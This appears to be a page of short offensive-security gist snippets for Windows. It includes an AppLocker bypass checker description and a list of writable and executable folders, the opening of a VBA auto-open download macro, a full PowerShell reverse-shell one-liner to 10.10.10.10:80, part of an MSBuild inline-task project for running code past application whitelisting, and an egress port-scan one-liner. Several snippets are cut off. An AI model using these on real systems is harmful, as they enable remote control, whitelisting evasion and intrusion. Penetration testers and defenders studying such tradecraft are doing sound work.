egre55

@echo off

REM Influenced by the Powershell-based AppLocker Bypass Checker (created by Tom Aafloen), which attempts to find folder that are both writable
REM and executable under C:\Windows (whitelisted by AppLocker default rules).
REM
REM However, environments implementing application whitelisting may also block powershell.exe.
REM 
REM This intends to be a non-PowerShell method of finding AppLocker bypasses under the entire C:\. Replace puttygen.exe as appropriate. Run as a
REM standard (non-admin) user ;D. Bypasses listed in bypasses.txt

egre55

# writable and executable Windows folders with AppLocker Default Rules in effect

Windows Server 2019 (Version 10.0.17763.914)

C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\spool\drivers\color

egre55

C:\>dir /B /S powershell.exe /S system.management.automation.dll

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.14393.0_none_968a6a2f18e547eb\powershell.exe
C:\Windows\WinSxS\msil_system.management.automation_31bf3856ad364e35_1.0.0.0_none_6340379543bd8a03\System.Management.Automation.dll
C:\Windows\WinSxS\msil_system.management.automation_31bf3856ad364e35_10.0.14393.0_none_f2bad6783ea6eb6a\System.Management.Automation.dll
C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.14393.0_none_a0df14814d4609e6\powershell.exe

egre55

' based on
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
'
' powashell.csproj by @SubTee
' https://gist.github.com/egre55/7a6b6018c9c5ae88c63bdb23879df4d0

Sub Document_Open()
Dim WinHttpReq As Object
Dim oStream As Object
Dim myURL As String

egre55

# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

egre55

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
  <Target Name="Hello">
   <ClassExample />
  </Target>
	<UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >

egre55

# Ugly PowerShell egress check one-liner (works in Constrained Language Mode)
# NMap top 50 ports. Checking > 50 may cause Memory DoS

foreach ($i in 50,21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,515,548,554,587,646,993,995,1025,1026,1027,1433,1720,1723,2000,2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154){Start-Job -ScriptBlock {param($i) & Test-NetConnection -ComputerName 10.10.10.10 -Port $i} -ArgumentList $i} Get-Job | Wait-Job | Get-Job | Receive-Job